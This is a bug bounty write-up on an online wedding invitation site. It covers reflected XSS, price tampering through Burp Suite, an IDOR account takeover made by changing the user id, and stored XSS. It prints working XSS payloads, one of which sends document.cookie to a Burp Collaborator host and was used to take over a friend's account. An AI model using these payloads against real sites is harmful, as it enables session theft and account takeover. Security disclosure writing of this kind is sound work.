From Wedding to Hacking
Hello everyone, how are you all doing? I hope each and every one of you is doing well. In this article, it might be a bit longer than the previous ones.
It all started when I was invited to attend my friend’s wedding event through a website link. My friend used a website that provides online invitation creation for an event. I will be sharing several sections regarding the explanation of the bugs that I discovered:
- XSS Reflected
- Change Price From Parameter Tampering
- Account Take Over
- XSS Stored
I hope you can easily find what you’re looking for within this article, and for the website I mentioned above, we will refer to it as “site.com”.
XSS Reflected
When I opened the invitation link sent by my friend, I received a URL www.site.com/my-friend-and-girl that contained the details of their wedding invitation.
Then I started to wonder, could this invitation be customized for specific individuals, like the name “naruto,” for example? Does this invitation allow for the inclusion of personally created names like that? I immediately opened my terminal and used the tool “arjun” to check if there were any other parameters present in that URL.
arjun -u https://site.com/my-friend-and-girl
After waiting for a while, I obtained the parameters “tap, rayId, to, rxk”
I chose to use the “to” parameter, so the full URL became www.site.com/my-friend-and-girl?to=naruto. And to my surprise, the name “naruto” that I inputted appeared in the invitation.
Then i use this payload
“><img src=x onerror=alert(1)>
And I successfully executed the pop-up alert.
Change Price From Parameter Tampering
After obtaining the XSS Reflected, I thought, why not take a little time to explore what the website has to offer. I arrived at the pricing page, which contained premium packages for users who wanted to access additional features. I attempted to purchase a premium account without the added features.
I turned on Burp Suite and proceeded with the payment, and i got the request data like this.
I obtained the parameter “Price:124000” and immediately I changed it to “Price:10”. Then, I forwarded the request data.
Unfortunately, I didn’t get what I was expecting, which was a change in the price.
I tried going back to the previous page, and this time I attempted to add another feature to my purchase.
I made sure that “intercept” was on in Burp Suite and proceeded with the payment. I obtained the following request data:
Because previously I had attempted to change the initial price but didn’t succeed, this time I modified all the “Price” parameters under the “Items” section to “10”.
I found that the price had changed to well below the actual price I was supposed to pay, which was “1,003,976”. It became “129,570”.
Account Take Over
Hmm, interesting, I think. I returned to do a deeper recon on the user dashboard section. I created a user on the website and tried to look at the ‘Edit Profile’ section.
I filled in the required data before pressing ‘Update Profile.’ I made sure my Burp Suite was running.
When looking at the screenshot above, there are several interesting parameters, namely ‘id, is_admin, is_trial, is_reseller, is_premium, saldo, premium’. I tried changing all the parameters except the ‘id’ parameter, but unfortunately, none of them worked.
I attempted to change ‘id: 165309 <my first account>’ to ‘id: 165310 <my second account>’, and it worked. The data on my second account changed to match the first account.
To take over an account, you can request a password reset link sent to the registered WhatsApp number.
But when I returned to the dashboard, I realized there was a password form, so I filled it in immediately and received a data request as follows
I changed the ‘id’ parameter as I did above, and at this stage. I could access someone else’s account without needing to request a password reset. It was as simple as creating a new password and changing the ‘id’ parameter.
XSS Stored
XSS Stored here I used to perform cookie stealing, leading to an account takeover. I found this bug when creating a free invitation on the website with same template like my friend. The invitation link is located at ‘www.site.com/test-bug'
In the music section, you can customize it by adding SoundCloud, and I tried inputting a simple payload.
“><h1>lol
And it was immediately rendered on the page. I began to wonder if this would be stored. I inserted an XSS payload.
“><img src=x onerror=prompt(document.cookie)>
I tried accessing my digital invitation and the XSS payload appeared perfectly.
I used Burp Collaborator as a server to capture the cookie that would be taken. I used a simple payload like this.
“><img src=x onerror=window.location.href=’http://<burp-collabolator>/?cookie=’+document.cookie>
After that, I inserted it into the music form, and asked my friend to access the invitation. Hehe.
In the Burp Collaborator, I received a response like the one below.
I immediately changed all the cookies in the browser to match the cookie I obtained.
I refreshed my browser, and I successfully gained access to my friend’s account.
I reported it, and unexpectedly, I received a reward for my report. I have requested permission to write this article, and they have granted it.
~ I’ve obtained permission, but they mentioned using the inspect element and modifying the data as needed because they didn’t want any accidental publication of sensitive user data and their data. However, the way I found the bug is as I reported, but they asked me to use the latest screenshot after they patched their system.
Maybe that’s all from me, hopefully it can be a reference for you. I’m RyuuKhagetsu, see you in next article.
